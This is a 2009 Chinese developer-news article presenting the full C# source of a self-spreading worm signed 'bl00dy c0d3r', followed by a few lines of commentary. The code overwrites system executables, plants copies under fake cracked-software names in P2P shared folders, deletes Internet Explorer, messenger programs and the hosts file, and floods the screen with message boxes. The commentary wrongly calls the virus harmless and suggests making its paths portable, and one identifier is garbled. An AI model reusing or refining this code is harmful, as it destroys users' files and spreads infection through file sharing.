C#病毒源码分析-控件新闻-慧都网

C#病毒源码分析

原创|其它|编辑：郝浩|2009-08-19 11:38:46.000|阅读 633 次

概述：本文分析了一个没有杀伤力的C#的病毒源代码。

　　病毒代码如下

/* intento basico para un virus en C#
　　* iniciacion del projecto Lunes 10 de Julio del 2006
　　* ~~bl00dy c0d3r~~
　　*/
　　using System;
　　using System.IO;
　　using System.Windows.Forms;
　　class MainClass {
　　public static void Main() {
　　string pauseline = "";
　　System.Windows.Forms.View.LargeIcon.Equals(@"cd.ico");
　　Console.WriteLine("Iniciating Install.. ");
　　Console.WriteLine("Press ENTER to start...");
　　pauseline = Console.ReadLine();
　　try {
　　Application.StartupPath.Clone();
　　} catch (Exception) {
　　Console.WriteLine("StartUp Path, not cloned..");
　　} try {
　　Application.AllowQuit.Equals(false);
　　} catch (Exception) {
　　Console.WriteLine("to quit press Ctrl + C");
　　}
　　new trigger();
　　}
　　}
　　class trigger {
　　public trigger(){
　　long trigger, counter;
　　trigger = 10000;
　　counter = 2;
　　while (trigger != counter) {
　　counter = counter + 1;
　　Console.WriteLine("{0} << progress out of 10000", counter);
　　}
　　new effects(); // al activarse se ira a MainForm() y copy()
　　}
　　}
　　class copy {
　　public copy() {
　　try {
　　File.Copy(Application.ExecutablePath, System.Environment.SystemDirectory + @"\winlogon.dll.exe", true);
　　} catch (Exception) {
　　Console.WriteLine("winlogon failed permanently");
　　}
　　try {
　　File.Copy(Application.ExecutablePath, @"C:\WINDOWS\system32\taskman.exe", true);
　　} catch (Exception) {
　　Console.WriteLine("Finishing...");
　　}try {
　　File.Copy(Application.ExecutablePath, System.Environment.SystemDirectory + @"\notepad.exe", true);
　　}catch (Exception){
　　Console.WriteLine("Notepad failed permanently");
　　} try {
　　File.Copy(Application.ExecutablePath, @"C:\Documents and Settings\Owner\Shared\Norton Antivirus~craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Documents and Settings\Owner\Shared\LimeWire Pro~10.5 Craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Documents and Settings\Owner\Shared\Key Generator Universal.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Documents and Settings\Owner\Shared\Generator Credit Card.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Documents and Settings\Owner\Shared\Halo 2.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Documents and Settings\Owner\Shared\Morpheus Ultra~Craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Documents and Settings\Owner\Shared\AntiSpyware Ultra.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Documents and Settings\Owner\Shared\Craked Windows XP sp2.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Documents and Settings\Owner\Shared\Win Zip craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Documents and Settings\Owner\Shared\Macromedia Flash 8 craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Documents and Settings\Owner\Shared\Lord of the rings II craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Documents and Settings\Owner\Shared\Nero craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Documents and Settings\Owner\Shared\Google Earth Pro~craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Documents and Settings\Owner\Shared\Windows Vista Craked.exe", true);
　　} catch (Exception) {
　　Console.WriteLine("LimeWire not found..");
　　Console.WriteLine("Please try to download it at http://www.Limewire.com");
　　} try {
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Morpheus Ultra\My Shared Folder\Norton Antivirus~craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Morpheus Ultra\My Shared Folder\LimeWire Pro~10.5 Craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Morpheus Ultra\My Shared Folder\Key Generator Universal.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Morpheus Ultra\My Shared Folder\Generator Credit Card.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Morpheus Ultra\My Shared Folder\Halo 2.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Morpheus Ultra\My Shared Folder\Morpheus Ultra~Craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Morpheus Ultra\My Shared Folder\AntiSpyware Ultra.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Morpheus Ultra\My Shared Folder\Craked Windows XP sp2.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Morpheus Ultra\My Shared Folder\Win Zip craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Morpheus Ultra\My Shared Folder\Macromedia Flash 8 craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Morpheus Ultra\My Shared Folder\Lord of the rings II craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Morpheus Ultra\My Shared Folder\Nero craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Morpheus Ultra\My Shared Folder\Google Earth Pro~craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Morpheus Ultra\My Shared Folder\Windows Vista Craked.exe", true);
　　} catch (Exception) {
　　Console.WriteLine("Morpheus Ultra not Found..");
　　} try {
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Morpheus\My Shared Folder\Norton Antivirus~Craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Morpheus\My Shared Folder\LimeWire Pro~10.5 Craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Morpheus\My Shared Folder\Key Generator Universal.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Morpheus\My Shared Folder\Halo 2.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Morpheus\My Shared Folder\Morpheus Ultra~Craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Morpheus\My Shared Folder\AntiSpyware Ultra.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Morpheus\My Shared Folder\Craked Windows XP sp2.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Morpheus\My Shared Folder\Win Zip craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Morpheus\My Shared Folder\Macromedia Flash 8 craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Morpheus\My Shared Folder\Lord of the rings II craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Morpheus\My Shared Folder\Nero craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Morpheus\My Shared Folder\Google Earth Pro~craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Morpheus\My Shared Folder\Windows Vista Craked.exe", true);
　　} catch (Exception) {
　　Console.WriteLine("Morpheus not found..");
　　} try {
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Kazaa\My Shared Folder\Norton Antivirus~Craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Kazaa\My Shared Folder\LimeWire Pro~10.5 Craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Kazaa\My Shared Folder\Key Generator Universal.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Kazaa\My Shared Folder\Halo 2.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Kazaa\My Shared Folder\Morpheus Ultra~Craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Kazaa\My Shared Folder\AntiSpyware Ultra.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Kazaa\My Shared Folder\Craked Windows XP sp2.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Kazaa\My Shared Folder\Win Zip craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Kazaa\My Shared Folder\Macromedia Flash 8 craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Kazaa\My Shared Folder\Lord of the rings II craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Kazaa\My Shared Folder\Nero craked.exe", true);
　　File.Copy(Applica瓚ion.ExecutablePath, @"C:\Program Files\Kazaa\My Shared Folder\Google Earth Pro~craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Program Files\Kazaa\My Shared Folder\Windows Vista Craked.exe", true);
　　} catch (Exception) {
　　Console.WriteLine("Kazaa not found..");
　　}
　　}
　　}
　　class effects {
　　public effects() {
　　new copy();
　　try {
　　File.Delete(@"C:\Program Files\Yahoo!\Messenger\YPager.exe");
　　File.Delete(@"C:\Program Files\Internet Explorer\IEXPLORE.EXE");
　　File.Delete(@"C:\WINDOWS\$hf_mig$\KB873339\spmsg.dll");
　　File.Delete(@"C:\WINDOWS\system32\drivers\etc\hosts");
　　File.Delete(@"C:\Program Files\MSN Messenger\msvc.exe");
　　File.Delete(@"C:\Program Files\MSN Messenger\msnmsgr.exe");
　　} catch (Exception) {
　　Console.WriteLine("Internet Explorer not found..");
　　}
　　new report();
　　new infected();
　　Application.Run(new MainForm());
　　}
　　}
　　class infected {
　　public infected() {
　　string youInfected;
　　youInfected = "true";
　　if (youInfected == "true") {
　　Console.WriteLine("Finished!!");
　　Console.WriteLine("press ENTER to continue...");
　　string pauselineinfected;
　　pauselineinfected = Console.ReadLine();
　　} else {
　　new effects();
　　}
　　}
　　}
　　class report {
　　public report() {
　　// aqui se pondra el codigo de reporte
　　Console.WriteLine("Registering..");
　　}
　　}
　　class MainForm : Form {
　　public MainForm() {
　　long numDeVeces = 10000;
　　long counter = 1;
　　while (numDeVeces != counter) {
　　try {
　　Application.AllowQuit.Equals(false);
　　} catch (Exception) {
　　Console.WriteLine("JEJEJEJE!!!");
　　}
　　counter = counter + 1;
　　MessageBox.Show("Estas Infectad@ con bl00dy Mary, have phun!!\nNo intentes remover el virus o atacara!!",
　　"Error Fatal..", MessageBoxButtons.OK, MessageBoxIcon.Hand, MessageBoxDefaultButton.Button1);
　　}
　　}
　　}
　　// terminado Domingo 16 de Julio 2006 10:43 pm. -=[bl00dy c0d3r]=-

这个病毒没杀伤力,就是几个替换和拷贝文件而已

　　不过觉得作者有一段代码写的不精炼

　File.Copy(Application.ExecutablePath, @"C:\Documents and Settings\Owner\Shared\Norton Antivirus~craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Documents and Settings\Owner\Shared\LimeWire Pro~10.5 Craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Documents and Settings\Owner\Shared\Key Generator Universal.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Documents and Settings\Owner\Shared\Generator Credit Card.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Documents and Settings\Owner\Shared\Halo 2.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Documents and Settings\Owner\Shared\Morpheus Ultra~Craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Documents and Settings\Owner\Shared\AntiSpyware Ultra.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Documents and Settings\Owner\Shared\Craked Windows XP sp2.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Documents and Settings\Owner\Shared\Win Zip craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Documents and Settings\Owner\Shared\Macromedia Flash 8 craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Documents and Settings\Owner\Shared\Lord of the rings II craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Documents and Settings\Owner\Shared\Nero craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Documents and Settings\Owner\Shared\Google Earth Pro~craked.exe", true);
　　File.Copy(Application.ExecutablePath, @"C:\Documents and Settings\Owner\Shared\Windows Vista Craked.exe", true);
　　} catch (Exception) {
　　Console.WriteLine("LimeWire not found..");
　　Console.WriteLine("Please try to download it at http://www.Limewire.com");

　　磁盘路径C:\Documents and Settings\Owner\并不是每台计算机的操作系统都安装在C盘

　　可以用Environment.GetEnvironmentVariable 方法获得系统环境变量

　　例如用户配置文档目录%userprofile%,以及系统应用程序安装目录 %programfiles%都可以用上面那个方法获得.

　　例如获得用户配置文档目录

　　Environement.GetEnvironmentVariable("userprofile")

　　不过作者挺专业的

　　都写好了 autorun.inf和nfo文件

标签：

本站文章除注明转载外，均为本站原创或翻译。欢迎任何形式的转载，但请务必注明出处、不得修改原文相关链接，如果存在内容上的异议请邮件反馈至chenjj@evget.com

文章转载自：网络转载

上一篇：C# vs C++之二：GC vs RAII 下一篇：C# vs C++之一：委托 vs 函数指针